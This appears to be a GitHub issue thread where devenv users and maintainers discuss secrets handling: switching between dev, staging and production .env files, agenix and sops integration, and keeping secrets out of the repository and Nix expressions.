Secrets

[happysalada]

Is there an integration with something like agenix for secrets handling inside the repo ? For deployements and or database connections for example.

[domenkozar]

We do have .env support and for basic use cases https://www.dotenv.org/ works really well.

It would be great to have also agenix and sops support!

[happysalada]

When you say .env support, you mean adding an env var just like in a nix derivation, not an actual .env , right ?

I was looking for the environment variable section in the documentation and couldnt find it.

Also, the ability to switch between .env files would be amazing. So you could connect to the staging db then connect to your local db with just a switch of environment.

[domenkozar]

https://devenv.sh/integrations/dotenv/

[happysalada]

This is quite nice, but I'm trying to reconcile this and the fact that env are dynamic. I would think most production setups include at least 2 environments (dev and staging), and small companies have also production most likely.

having it hardcoded in the devenv file feels wrong. Should there be some shell helpers to set the environment based on some predefined files ?

I'm thinking out loud here of course and not sure of what the best solution would be.

Maybe actually the best solution is just to have particular functions preceded by the dotenv --env .env.staging . So the solution would just be to have different shell functions for different purposes.

[domenkozar]

Currently you can do dotenv.filename = ".env.production"; to tell it to load an env specific environment.

I'd be curious to hear what kind of workflow you'd expect and we can implement it.

[happysalada]

I have a web app where i want to be able to do pnpm run dev to start developping. Obviously this has to include all the dev environment. Then i want to test my workflow with the staging env vars to verify i havent forgotten a migration or anything. Last is that sometimes i need to apply db chances to production and i need to be able to connect there . So i have tasks that require 3 different environments, with different commands that need to be run.

The way to currently approach the problem is to use dotenv-cli -e .env.common.dev -e .env.my_app.dev pnpm run dev That will run my development environment. I need to switch the env and the command for other tasks, but it works.

What i would imagine would be amazing would be a shell command that gives me the dev env vars loaded directly. Then i can just pnpm run dev and be good to go. I shouldnt have to make custom commands for each environment i think.

The worst with this approach is that i have to go through an external service to not commit my secrets to the repo. Having them encrypted right there and then would be amazing.

Let me know if any of that is too vague

[eth3lbert]

I thought you could use scripts to achieve something similar.

[happysalada]

Definitely ! Thats what i meant by command Its a bit boiler platy but it works for now. I was trying to think about an ideal outcome.

[gallexme]

@happysalada i edited the agenix home manager module so it can be used from devenv(even on none nixos/hm/nix-darwin machines) example: https://gist.github.com/gallexme/9ade2bc91df4d4263ee006264e2f3b9d its still compatible with agenix and agenix-rekey, it decrypts the secrets in ur repos folder when u enter devenv, so add those folders into .gitignore, havent had the time to make it nicer yet

[happysalada]

@gallexme nice!

I've given some thought to the .env api that I think would make sense. it seems to me it should look like this

{
   environments = {
      dev = {
          NODE_ENV.value = "development"; # just an example
          OPENAI_API_KEY.file = ".env/OPENAI_API_KEY.age"; # in case there is an integration with agenix
            default = true; # to signify that by default you are on this environment
           ....
       };
       staging = {
           ....
       }
   };
}

with a nice command for switching from one to the other. switch_env dev or switch_env staging or something similar. These are just my thoughts.

Additionally the welcome message that is used in https://github.com/numtide/devshell would be amazing. Just to tell you which environments are available and how to switch into them.

Just some thoughts.

[Atry]

We do have .env support and for basic use cases https://www.dotenv.org/ works really well.

It would be great to have also agenix and sops support!

As mentioned here, loading secrets from .env into nix expressions can lead to publish your secrets. Shall we instead load the .env in shell startup scripts, instead of in nix expression?

[MrFoxPro]

This can help https://github.com/aciceri/agenix-shell